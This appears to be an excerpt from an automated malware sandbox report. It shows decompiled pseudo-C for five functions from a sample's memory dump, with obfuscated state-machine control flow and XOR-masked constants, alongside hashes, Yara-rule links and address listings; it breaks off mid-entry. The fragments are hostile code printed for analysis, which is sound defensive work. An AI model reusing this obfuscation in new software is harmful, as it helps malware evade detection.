                                          Similarity
                                          • API ID:
                                          • String ID: 'V$\$bo
                                          • API String ID: 0-4178943049
                                          • Opcode ID: 8e38a099659fc669f1a53217cea53fcd1dece341b3ee1ddc17a653a95af50d55
                                          • Instruction ID: ed8381eac5cf1ad7f59b4663ca59454785909b0ab1019f4bd1c1e68c0172e219
                                          • Opcode Fuzzy Hash: 8e38a099659fc669f1a53217cea53fcd1dece341b3ee1ddc17a653a95af50d55
                                          • Instruction Fuzzy Hash: 08A1527190C3429FD358CF29C88940BFBF2BBC4758F10892EF59596260E7B58A498F87
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006C96CD, Relevance: 3.9, Strings: 3, Instructions: 191COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 94%
                                          			E006C96CD(signed int* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				char _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				unsigned int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				unsigned int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				void* _t162;
				signed int _t179;
				void* _t192;
				signed int _t193;
				signed int _t194;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				void* _t200;
				intOrPtr* _t222;
				signed int* _t223;
				signed int* _t226;

				_push(_a8);
				_t222 = _a4;
				_t223 = __ecx;
				_push(_t222);
				_push(__ecx);
				E006C602B(_t162);
				_v80 = 0xadf4;
				_t226 =  &(( &_v140)[4]);
				_t200 = 0xade8ac2;
				_t193 = 0x38;
				_v80 = _v80 / _t193;
				_v80 = _v80 ^ 0x00005e4d;
				_v88 = 0xd682;
				_v88 = _v88 ^ 0xf51d39be;
				_v88 = _v88 ^ 0xf51dab09;
				_v96 = 0x72b2;
				_v96 = _v96 ^ 0xfa4c809d;
				_v96 = _v96 ^ 0xfa4c99cb;
				_v116 = 0x90ca;
				_v116 = _v116 | 0x91d06c09;
				_v116 = _v116 ^ 0x5d2d7dc0;
				_v116 = _v116 ^ 0xccfdf140;
				_v124 = 0x94f4;
				_v124 = _v124 >> 9;
				_t194 = 0x7e;
				_v124 = _v124 / _t194;
				_v124 = _v124 >> 1;
				_v124 = _v124 ^ 0x00005a93;
				_v92 = 0xb2da;
				_v92 = _v92 >> 0xf;
				_v92 = _v92 ^ 0x00004526;
				_v132 = 0xfe39;
				_v132 = _v132 ^ 0x94a2bb32;
				_v132 = _v132 + 0xffff197d;
				_v132 = _v132 + 0xa385;
				_v132 = _v132 ^ 0x94a23d21;
				_v104 = 0xe4d2;
				_v104 = _v104 ^ 0x49cfaa80;
				_v104 = _v104 | 0x48b9e868;
				_v104 = _v104 ^ 0x49ffe136;
				_v112 = 0xb598;
				_v112 = _v112 ^ 0x0d96fbe5;
				_v112 = _v112 + 0x88b9;
				_v112 = _v112 ^ 0x0d96d484;
				_v136 = 0x3e03;
				_v136 = _v136 ^ 0x29ac334c;
				_v136 = _v136 >> 9;
				_v136 = _v136 << 8;
				_v136 = _v136 ^ 0x14d602a1;
				_v120 = 0xd3c3;
				_t195 = 0x26;
				_v120 = _v120 / _t195;
				_t196 = 0x3e;
				_v120 = _v120 * 0x17;
				_v120 = _v120 ^ 0x0000f1c0;
				_v140 = 0x72b1;
				_v140 = _v140 + 0xffffab40;
				_v140 = _v140 << 0xe;
				_v140 = _v140 / _t196;
				_v140 = _v140 ^ 0x001e8f72;
				_v128 = 0x9994;
				_v128 = _v128 + 0xffff8c6c;
				_v128 = _v128 + 0xa4f6;
				_t197 = 0x3d;
				_v128 = _v128 / _t197;
				_v128 = _v128 ^ 0x00001242;
				_v100 = 0x8258;
				_v100 = _v100 + 0xffff85b7;
				_v100 = _v100 * 0x51;
				_v100 = _v100 ^ 0x000280a1;
				_v84 = 0x5c44;
				_v84 = _v84 ^ 0x1285eccb;
				_v84 = _v84 ^ 0x12858e57;
				_v108 = 0x7f88;
				_v108 = _v108 | 0x4d438ffe;
				_v108 = _v108 + 0xffff02b4;
				_v108 = _v108 ^ 0x4d436acf;
				do {
					while(_t200 != 0xade8ac2) {
						if(_t200 == 0xeed9730) {
							_push(_t200);
							_push(_t200);
							_t179 = E006C8736(_t223[1]);
							 *_t223 = _t179;
							__eflags = _t179;
							if(__eflags != 0) {
								_t200 = 0x173d5c4e;
								continue;
							}
						} else {
							if(_t200 == 0xffe2862) {
								E006D360F( &_v76, _v120, _v140,  *_t222, _v128);
								_t226 =  &(_t226[3]);
								_t200 = 0x220c9c88;
								continue;
							} else {
								if(_t200 == 0x173d5c4e) {
									E006D50F2( &_v76, _v104, _v112, _v136, _t223);
									_t226 =  &(_t226[3]);
									_t200 = 0xffe2862;
									continue;
								} else {
									if(_t200 == 0x220c9c88) {
										E006C7998(_v100, _v84, __eflags, _t222 + 4,  &_v76, _v108);
									} else {
										if(_t200 != 0x2d9f638c) {
											goto L13;
										} else {
											_t207 = _t222;
											_t223[1] = E006D7A0F(_t222);
											_t192 = E006C78A5(_t222, _t207, 0x1000, _t207, 0x400);
											_t226 =  &(_t226[4]);
											_t200 = 0xeed9730;
											_t223[1] = _t223[1] + _t192;
											continue;
										}
									}
								}
							}
						}
						L16:
						__eflags =  *_t223;
						_t161 =  *_t223 != 0;
						__eflags = _t161;
						return 0 | _t161;
					}
					 *_t223 = 0;
					_t200 = 0x2d9f638c;
					_t223[1] = 0;
					L13:
					__eflags = _t200 - 0x18ac994b;
				} while (__eflags != 0);
				goto L16;
			}
































                                          0x006c96d7
                                          0x006c96de
                                          0x006c96e5
                                          0x006c96e7
                                          0x006c96e9
                                          0x006c96ea
                                          0x006c96ef
                                          0x006c96f7
                                          0x006c9700
                                          0x006c9707
                                          0x006c970c
                                          0x006c9712
                                          0x006c971a
                                          0x006c9722
                                          0x006c972a
                                          0x006c9732
                                          0x006c973a
                                          0x006c9742
                                          0x006c974a
                                          0x006c9752
                                          0x006c975a
                                          0x006c9762
                                          0x006c976a
                                          0x006c9772
                                          0x006c977b
                                          0x006c9780
                                          0x006c9786
                                          0x006c978a
                                          0x006c9792
                                          0x006c979a
                                          0x006c979f
                                          0x006c97a7
                                          0x006c97af
                                          0x006c97b7
                                          0x006c97bf
                                          0x006c97c7
                                          0x006c97cf
                                          0x006c97d7
                                          0x006c97df
                                          0x006c97e7
                                          0x006c97ef
                                          0x006c97f7
                                          0x006c97ff
                                          0x006c9807
                                          0x006c980f
                                          0x006c9817
                                          0x006c981f
                                          0x006c9824
                                          0x006c9829
                                          0x006c9831
                                          0x006c983d
                                          0x006c9842
                                          0x006c984d
                                          0x006c984e
                                          0x006c9852
                                          0x006c985a
                                          0x006c9862
                                          0x006c986a
                                          0x006c9875
                                          0x006c9879
                                          0x006c9883
                                          0x006c9890
                                          0x006c9898
                                          0x006c98a6
                                          0x006c98a9
                                          0x006c98ad
                                          0x006c98b5
                                          0x006c98bd
                                          0x006c98ca
                                          0x006c98ce
                                          0x006c98d6
                                          0x006c98de
                                          0x006c98e6
                                          0x006c98ee
                                          0x006c98f6
                                          0x006c98fe
                                          0x006c9906
                                          0x006c9910
                                          0x006c9910
                                          0x006c9922
                                          0x006c99d7
                                          0x006c99d8
                                          0x006c99dc
                                          0x006c99e1
                                          0x006c99e5
                                          0x006c99e7
                                          0x006c99e9
                                          0x00000000
                                          0x006c99e9
                                          0x006c9928
                                          0x006c992e
                                          0x006c99b9
                                          0x006c99be
                                          0x006c99c1
                                          0x00000000
                                          0x006c9930
                                          0x006c9932
                                          0x006c9995
                                          0x006c999a
                                          0x006c999d
                                          0x00000000
                                          0x006c9934
                                          0x006c993a
                                          0x006c9a1d
                                          0x006c9940
                                          0x006c9946
                                          0x00000000
                                          0x006c994c
                                          0x006c994c
                                          0x006c9953
                                          0x006c9972
                                          0x006c9977
                                          0x006c997a
                                          0x006c997f
                                          0x00000000
                                          0x006c997f
                                          0x006c9946
                                          0x006c993a
                                          0x006c9932
                                          0x006c992e
                                          0x006c9a26
                                          0x006c9a28
                                          0x006c9a2c
                                          0x006c9a2c
                                          0x006c9a36
                                          0x006c9a36
                                          0x006c99f0
                                          0x006c99f2
                                          0x006c99f7
                                          0x006c99fa
                                          0x006c99fa
                                          0x006c99fa
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: &E$D\$M^
                                          • API String ID: 0-182273106
                                          • Opcode ID: 7e73a032ed4c88d170dab7654c0d89932568e0a188c774ecf291dec26883a179
                                          • Instruction ID: 9019d455b313f304850262b59fa1b0c961bbb09e2ce11dbdd7d47a371f910169
                                          • Opcode Fuzzy Hash: 7e73a032ed4c88d170dab7654c0d89932568e0a188c774ecf291dec26883a179
                                          • Instruction Fuzzy Hash: 9B8163715083819FD358CF25C88992BBBE2FBD4358F50891DF196862A0E3B6CA49CF46
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006C153C, Relevance: 3.9, Strings: 3, Instructions: 131COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E006C153C() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _t116;
				void* _t117;
				void* _t119;
				signed int _t122;
				signed int _t134;
				void* _t136;
				signed int _t137;
				signed int* _t138;

				_t138 =  &_v560;
				_v528 = 0xa2e9;
				_v528 = _v528 + 0xfffffe64;
				_t119 = 0x3a74a7f9;
				_v528 = _v528 ^ 0x0000e8bc;
				_v532 = 0xc148;
				_v532 = _v532 + 0x228e;
				_v532 = _v532 ^ 0x0000dc63;
				_v548 = 0x43c;
				_v548 = _v548 + 0xffff6922;
				_v548 = _v548 | 0xfd2a2fe1;
				_v548 = _v548 ^ 0xb6db9be5;
				_v548 = _v548 ^ 0x4924f3d5;
				_v544 = 0x1b71;
				_v544 = _v544 ^ 0xba1667e6;
				_v544 = _v544 >> 2;
				_v544 = _v544 << 7;
				_v544 = _v544 ^ 0x42cfc722;
				_v540 = 0x29dd;
				_v540 = _v540 + 0xa2;
				_v540 = _v540 ^ 0xc29808bd;
				_v540 = _v540 + 0xffff2b53;
				_v540 = _v540 ^ 0xc2975a13;
				_v556 = 0x7857;
				_v556 = _v556 ^ 0xa059c8e7;
				_v556 = _v556 << 9;
				_v556 = _v556 << 4;
				_v556 = _v556 ^ 0x361613d4;
				_v560 = 0x6ef2;
				_v560 = _v560 ^ 0x7dc12174;
				_v560 = _v560 * 0x52;
				_t136 = 0;
				_v560 = _v560 ^ 0x47eb388f;
				_v536 = 0x33fe;
				_v536 = _v536 + 0x28fb;
				_v536 = _v536 ^ 0x000029c0;
				_v552 = 0x40f6;
				_v552 = _v552 | 0x9b4debbc;
				_v552 = _v552 + 0x1ce1;
				_t134 = 0x7e;
				_t137 = _v536;
				_t135 = _v536;
				_v552 = _v552 / _t134;
				_v552 = _v552 ^ 0x013b83e5;
				_v524 = 0xe5bd;
				_v524 = _v524 ^ 0x97a1ef4c;
				_v524 = _v524 ^ 0x97a11b87;
				do {
					while(_t119 != 0x6cc9294) {
						if(_t119 == 0xcd96d8e) {
							_v560 = 0x65f6;
							_t122 = 0x33;
							_v560 = _v560 / _t122;
							_v560 = _v560 + 0xffffea35;
							_v560 = _v560 ^ 0xd5d8ecd6;
							_t136 =  ==  ? 1 : _t136;
						} else {
							if(_t119 == 0x11374e9c) {
								E006CE29C(_v552, _v524, _t137);
								_t119 = 0xcd96d8e;
								continue;
							} else {
								if(_t119 == 0x31a842b3) {
									_t116 = E006C8697();
									_t135 = _t116;
									if(_t116 != 0) {
										_t119 = 0x34255e69;
										continue;
									}
								} else {
									if(_t119 == 0x34255e69) {
										_t117 = E006C60B9( &_v520, _v548, _v544, _t119, _v540, _t135, _v556);
										_t138 =  &(_t138[5]);
										if(_t117 != 0) {
											_t119 = 0x6cc9294;
											continue;
										}
									} else {
										if(_t119 != 0x3a74a7f9) {
											goto L14;
										} else {
											_t119 = 0x31a842b3;
											continue;
										}
									}
								}
							}
						}
						L17:
						return _t136;
					}
					_t137 = E006C28CE( &_v520, _v560, _v536);
					_t119 = 0x11374e9c;
					L14:
				} while (_t119 != 0x55f7722);
				goto L17;
			}






















                                          0x006c153c
                                          0x006c1546
                                          0x006c1550
                                          0x006c1558
                                          0x006c155d
                                          0x006c1565
                                          0x006c156d
                                          0x006c1575
                                          0x006c157d
                                          0x006c1585
                                          0x006c158d
                                          0x006c1595
                                          0x006c159d
                                          0x006c15a5
                                          0x006c15ad
                                          0x006c15b5
                                          0x006c15ba
                                          0x006c15bf
                                          0x006c15c7
                                          0x006c15cf
                                          0x006c15d7
                                          0x006c15df
                                          0x006c15e7
                                          0x006c15ef
                                          0x006c15f7
                                          0x006c15ff
                                          0x006c1604
                                          0x006c1609
                                          0x006c1611
                                          0x006c1619
                                          0x006c1626
                                          0x006c162a
                                          0x006c162c
                                          0x006c1634
                                          0x006c163c
                                          0x006c1644
                                          0x006c164c
                                          0x006c1654
                                          0x006c165c
                                          0x006c166a
                                          0x006c166d
                                          0x006c1675
                                          0x006c1679
                                          0x006c167d
                                          0x006c1685
                                          0x006c168d
                                          0x006c1695
                                          0x006c169d
                                          0x006c169d
                                          0x006c16af
                                          0x006c176c
                                          0x006c177c
                                          0x006c177f
                                          0x006c1785
                                          0x006c178e
                                          0x006c179c
                                          0x006c16b5
                                          0x006c16bb
                                          0x006c1733
                                          0x006c173b
                                          0x00000000
                                          0x006c16bd
                                          0x006c16c3
                                          0x006c1715
                                          0x006c171a
                                          0x006c171e
                                          0x006c1720
                                          0x00000000
                                          0x006c1720
                                          0x006c16c5
                                          0x006c16cb
                                          0x006c16f6
                                          0x006c16fb
                                          0x006c1700
                                          0x006c1706
                                          0x00000000
                                          0x006c1706
                                          0x006c16cd
                                          0x006c16d3
                                          0x00000000
                                          0x006c16d9
                                          0x006c16d9
                                          0x00000000
                                          0x006c16d9
                                          0x006c16d3
                                          0x006c16cb
                                          0x006c16c3
                                          0x006c16bb
                                          0x006c17a0
                                          0x006c17ab
                                          0x006c17ab
                                          0x006c1757
                                          0x006c1759
                                          0x006c175e
                                          0x006c175e
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: Wx$i^%4$i^%4
                                          • API String ID: 0-1584002782
                                          • Opcode ID: 27d29786511c872af26309c852dc0a5908d1aeb1159e12b99986ab535e94628a
                                          • Instruction ID: 5807affd73e9be1bc7ecadcc32d319793f84867794d26663d53d579faf287f3b
                                          • Opcode Fuzzy Hash: 27d29786511c872af26309c852dc0a5908d1aeb1159e12b99986ab535e94628a
                                          • Instruction Fuzzy Hash: 405167311083428BD398CF25C19992BBBE2FBC5718F140A1DF096962A1D7B4CA49CF97
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006D7D03, Relevance: 3.9, Strings: 3, Instructions: 127COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 93%
                                          			E006D7D03() {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _t105;
				intOrPtr _t112;
				signed int _t114;
				signed int _t115;
				signed int _t116;
				intOrPtr _t117;
				void* _t119;
				void* _t129;
				signed int* _t131;

				_t131 =  &_v44;
				_v8 = 0x68fc;
				_v8 = _v8 + 0xbb36;
				_v8 = _v8 ^ 0x000162e9;
				_v44 = 0xabcf;
				_t114 = 0x5a;
				_v44 = _v44 / _t114;
				_v44 = _v44 << 5;
				_t129 = 0x1aabdcf3;
				_v44 = _v44 ^ 0x41a75d37;
				_v44 = _v44 ^ 0x41a744f3;
				_v12 = 0xa837;
				_v12 = _v12 + 0xbdd3;
				_v12 = _v12 ^ 0x0001592e;
				_v36 = 0x1a64;
				_v36 = _v36 + 0x1ecf;
				_v36 = _v36 | 0x383b765c;
				_v36 = _v36 ^ 0x383b27b5;
				_v40 = 0x1cb7;
				_v40 = _v40 | 0xfad83379;
				_t115 = 0x73;
				_v40 = _v40 / _t115;
				_v40 = _v40 ^ 0x022e74ac;
				_v16 = 0x5673;
				_v16 = _v16 << 4;
				_v16 = _v16 ^ 0x00050551;
				_v20 = 0x8ddb;
				_v20 = _v20 + 0xffffc9bf;
				_t116 = 0x22;
				_v20 = _v20 * 0x54;
				_v20 = _v20 ^ 0x001c9060;
				_v24 = 0x24b0;
				_v24 = _v24 ^ 0x7eaabc9b;
				_v24 = _v24 ^ 0x558f972f;
				_v24 = _v24 ^ 0x2b251b7e;
				_v28 = 0xbf97;
				_v28 = _v28 + 0xffff41a2;
				_v28 = _v28 * 0x14;
				_v28 = _v28 ^ 0x00001fe8;
				_v32 = 0x3a57;
				_v32 = _v32 << 3;
				_v32 = _v32 ^ 0x30418ed0;
				_v32 = _v32 ^ 0x30407688;
				_v4 = 0xf5c8;
				_v4 = _v4 / _t116;
				_v4 = _v4 ^ 0x00000add;
				_t117 =  *0x6dca30; // 0x0
				do {
					while(_t129 != 0x15241428) {
						if(_t129 == 0x1aabdcf3) {
							_push(_t117);
							_push(_t117);
							_t119 = 0x2c;
							_t117 = E006C8736(_t119);
							 *0x6dca30 = _t117;
							if(_t117 != 0) {
								_t129 = 0x337355f8;
								continue;
							}
						} else {
							if(_t129 != 0x337355f8) {
								goto L8;
							} else {
								_push(_t117);
								_t112 = E006C59D5(_t117, _v36, _t117, _v40, _v16);
								_t117 =  *0x6dca30; // 0x0
								_t131 =  &(_t131[5]);
								_t129 = 0x15241428;
								 *((intOrPtr*)(_t117 + 8)) = _t112;
								continue;
							}
						}
						goto L9;
					}
					_push(_t117);
					_t105 = E006C1132(_v20, _t117, _v24, _t117, 0, _v28, _v32, _v4, E006CE377);
					_t117 =  *0x6dca30; // 0x0
					_t131 =  &(_t131[9]);
					_t129 = 0x3afebe4c;
					 *((intOrPtr*)(_t117 + 0x18)) = _t105;
					L8:
				} while (_t129 != 0x3afebe4c);
				L9:
				return 0 | _t117 != 0x00000000;
			}























                                          0x006d7d03
                                          0x006d7d06
                                          0x006d7d10
                                          0x006d7d18
                                          0x006d7d20
                                          0x006d7d30
                                          0x006d7d35
                                          0x006d7d3b
                                          0x006d7d40
                                          0x006d7d45
                                          0x006d7d52
                                          0x006d7d5f
                                          0x006d7d6c
                                          0x006d7d74
                                          0x006d7d7c
                                          0x006d7d84
                                          0x006d7d8c
                                          0x006d7d94
                                          0x006d7d9c
                                          0x006d7da4
                                          0x006d7db0
                                          0x006d7db5
                                          0x006d7dbb
                                          0x006d7dc3
                                          0x006d7dcb
                                          0x006d7dd0
                                          0x006d7dd8
                                          0x006d7de0
                                          0x006d7ded
                                          0x006d7dee
                                          0x006d7df2
                                          0x006d7dfa
                                          0x006d7e02
                                          0x006d7e0a
                                          0x006d7e12
                                          0x006d7e1a
                                          0x006d7e22
                                          0x006d7e2f
                                          0x006d7e33
                                          0x006d7e3b
                                          0x006d7e43
                                          0x006d7e48
                                          0x006d7e50
                                          0x006d7e58
                                          0x006d7e66
                                          0x006d7e6a
                                          0x006d7e72
                                          0x006d7e78
                                          0x006d7e78
                                          0x006d7e82
                                          0x006d7eb7
                                          0x006d7eb8
                                          0x006d7ebb
                                          0x006d7ec3
                                          0x006d7ec5
                                          0x006d7ecd
                                          0x006d7ecf
                                          0x00000000
                                          0x006d7ecf
                                          0x006d7e84
                                          0x006d7e86
                                          0x00000000
                                          0x006d7e88
                                          0x006d7e88
                                          0x006d7e96
                                          0x006d7e9b
                                          0x006d7ea1
                                          0x006d7ea4
                                          0x006d7ea6
                                          0x00000000
                                          0x006d7ea6
                                          0x006d7e86
                                          0x00000000
                                          0x006d7e82
                                          0x006d7ed3
                                          0x006d7ef1
                                          0x006d7ef6
                                          0x006d7efc
                                          0x006d7eff
                                          0x006d7f01
                                          0x006d7f04
                                          0x006d7f04
                                          0x006d7f0d
                                          0x006d7f1a

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: W:$\v;8$sV
                                          • API String ID: 0-492820393
                                          • Opcode ID: 780ea2acc8ee9ae23c9ca9442f43ada66974badfc4b3be31eecb7a0659942f11
                                          • Instruction ID: 5b7c5cd487316072872a92235e17a0e45f3ac5573f545bf76039721edb5dacc4
                                          • Opcode Fuzzy Hash: 780ea2acc8ee9ae23c9ca9442f43ada66974badfc4b3be31eecb7a0659942f11
                                          • Instruction Fuzzy Hash: 46519C715093419FD358CF25C88A81FBBE2FB88368F540A1DF486562A0D3B5CA49CF87
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006D61B8, Relevance: 3.8, Strings: 3, Instructions: 77COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 97%
                                          			E006D61B8(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t64;
				void* _t68;
				void* _t69;
				signed int _t71;
				void* _t75;
				void* _t76;
				signed int* _t78;

				_t78 =  &_v24;
				_v12 = 0x5dfc;
				_v12 = _v12 * 0x23;
				_t69 = __ecx;
				_v12 = _v12 << 7;
				_t75 = 0;
				_v12 = _v12 ^ 0x066cb215;
				_t76 = 0x1b4ca438;
				_v24 = 0xd6f7;
				_v24 = _v24 + 0xffffb773;
				_v24 = _v24 + 0xd9f1;
				_v24 = _v24 + 0xe528;
				_v24 = _v24 ^ 0x000200e6;
				_v16 = 0x64b4;
				_v16 = _v16 + 0xda3f;
				_v16 = _v16 >> 1;
				_v16 = _v16 >> 0xd;
				_v16 = _v16 ^ 0x0000725d;
				_v4 = 0xc8c2;
				_v4 = _v4 | 0x9945d150;
				_v4 = _v4 + 0x9caf;
				_v4 = _v4 ^ 0x99461e9f;
				_v20 = 0xe019;
				_t71 = 0x46;
				_v20 = _v20 / _t71;
				_v20 = _v20 >> 0xd;
				_v20 = _v20 >> 4;
				_v20 = _v20 ^ 0x00001f6d;
				_v8 = 0xf95b;
				_v8 = _v8 | 0x30645c78;
				_v8 = _v8 + 0xffff8663;
				_v8 = _v8 ^ 0x3064d0a8;
				do {
					while(_t76 != 0x108726d) {
						if(_t76 == 0x1b4ca438) {
							_t76 = 0x2a486598;
							continue;
						} else {
							if(_t76 == 0x2a486598) {
								_push(_t71);
								_t68 = E006D7F1B();
								_t78 =  &(_t78[1]);
								_t76 = 0x108726d;
								_t75 = _t75 + _t68;
								continue;
							}
						}
						goto L7;
					}
					_t71 = _v16;
					_t64 = E006CD64E(_t71, _v4, _v20, _t69 + 4, _v8);
					_t78 =  &(_t78[3]);
					_t76 = 0xee7d46d;
					_t75 = _t75 + _t64;
					L7:
				} while (_t76 != 0xee7d46d);
				return _t75;
			}
















                                          0x006d61b8
                                          0x006d61bb
                                          0x006d61ce
                                          0x006d61d2
                                          0x006d61d4
                                          0x006d61d9
                                          0x006d61db
                                          0x006d61e3
                                          0x006d61e8
                                          0x006d61f5
                                          0x006d61fd
                                          0x006d6205
                                          0x006d620d
                                          0x006d6215
                                          0x006d621d
                                          0x006d6225
                                          0x006d6229
                                          0x006d622e
                                          0x006d6236
                                          0x006d623e
                                          0x006d6246
                                          0x006d624e
                                          0x006d6256
                                          0x006d6264
                                          0x006d6267
                                          0x006d626b
                                          0x006d6270
                                          0x006d6275
                                          0x006d627d
                                          0x006d6285
                                          0x006d628d
                                          0x006d6295
                                          0x006d629d
                                          0x006d629d
                                          0x006d62ab
                                          0x006d62cb
                                          0x00000000
                                          0x006d62ad
                                          0x006d62af
                                          0x006d62b9
                                          0x006d62ba
                                          0x006d62bf
                                          0x006d62c2
                                          0x006d62c7
                                          0x00000000
                                          0x006d62c7
                                          0x006d62af
                                          0x00000000
                                          0x006d62ab
                                          0x006d62df
                                          0x006d62e3
                                          0x006d62e8
                                          0x006d62eb
                                          0x006d62f0
                                          0x006d62f2
                                          0x006d62f2
                                          0x006d6303

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: ($]r$x\d0
                                          • API String ID: 0-3053701899
                                          • Opcode ID: 51c1d68f1b448b9cd01a0670611b7d4582907cb0fec310406faa2fe7817289f3
                                          • Instruction ID: 1e2ed4ad5b0de2f14db15917864cd58b712c65609dfa05d235139287bd595dac
                                          • Opcode Fuzzy Hash: 51c1d68f1b448b9cd01a0670611b7d4582907cb0fec310406faa2fe7817289f3
                                          • Instruction Fuzzy Hash: EA3164B29083428FD354DF15D88941BBBE1BBE4718F004E5EF499A6261D379CE0C8B93
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006D0B68, Relevance: 3.8, Strings: 3, Instructions: 75COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 83%
                                          			E006D0B68(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void* _t76;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006C602B(_t76);
				_v16 = 0x6860;
				_v16 = _v16 * 0x5b;
				_v16 = _v16 ^ 0xdc6b4abd;
				_v16 = _v16 ^ 0xdc4e778c;
				_v32 = 0xa230;
				_v32 = _v32 << 0xe;
				_v32 = _v32 ^ 0x288c6565;
				_v8 = 0xfe44;
				_v8 = _v8 | 0x4c3583fb;
				_v8 = _v8 + 0xfffff685;
				_v8 = _v8 ^ 0x61a5c761;
				_v8 = _v8 ^ 0x2d906c10;
				_v40 = 0xe5db;
				_v40 = _v40 | 0x9b65f6ba;
				_v40 = _v40 ^ 0x9b65d356;
				_v20 = 0x9adf;
				_v20 = _v20 + 0x49d9;
				_v20 = _v20 + 0xffff68ea;
				_v20 = _v20 ^ 0x00005968;
				_v36 = 0x94a7;
				_v36 = _v36 ^ 0xf3da6fb3;
				_v36 = _v36 ^ 0xf3dae7d2;
				_v28 = 0xd25a;
				_v28 = _v28 + 0x1e41;
				_v28 = _v28 | 0x2f85fa9d;
				_v28 = _v28 ^ 0x2f85d3ee;
				_v12 = 0x5326;
				_v12 = _v12 ^ 0x0ede0c0e;
				_v12 = _v12 >> 7;
				_v12 = _v12 << 4;
				_v12 = _v12 ^ 0x01db8a0a;
				_v24 = 0x6b2;
				_v24 = _v24 << 4;
				_v24 = _v24 | 0x9aa17d8a;
				_t63 =  &_v24;
				_v24 = _v24 ^ 0x9aa13f42;
				_push(_v32);
				_t91 = E006D889D(0x6dc0b0, _v16,  *_t63);
				E006CC680(__ecx, _v40, _v20, 0x6dc0b0, _v36, _a12, _t79, _a4);
				return E006D2025(_v28, _t91, _v12, _v24);
			}













                                          0x006d0b70
                                          0x006d0b75
                                          0x006d0b78
                                          0x006d0b7b
                                          0x006d0b7c
                                          0x006d0b7d
                                          0x006d0b82
                                          0x006d0b92
                                          0x006d0b95
                                          0x006d0b9c
                                          0x006d0ba3
                                          0x006d0baa
                                          0x006d0bae
                                          0x006d0bb5
                                          0x006d0bbc
                                          0x006d0bc3
                                          0x006d0bca
                                          0x006d0bd1
                                          0x006d0bd8
                                          0x006d0bdf
                                          0x006d0be6
                                          0x006d0bed
                                          0x006d0bf4
                                          0x006d0bfb
                                          0x006d0c02
                                          0x006d0c09
                                          0x006d0c10
                                          0x006d0c17
                                          0x006d0c1e
                                          0x006d0c25
                                          0x006d0c2c
                                          0x006d0c33
                                          0x006d0c3a
                                          0x006d0c41
                                          0x006d0c48
                                          0x006d0c4c
                                          0x006d0c50
                                          0x006d0c57
                                          0x006d0c5e
                                          0x006d0c62
                                          0x006d0c69
                                          0x006d0c69
                                          0x006d0c70
                                          0x006d0c7e
                                          0x006d0c96
                                          0x006d0cb3

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: &S$`h$hY
                                          • API String ID: 0-860638928
                                          • Opcode ID: 10bd70623fdd4759c151cc12a2df8a474579bf387df243e46218902f470e8f6f
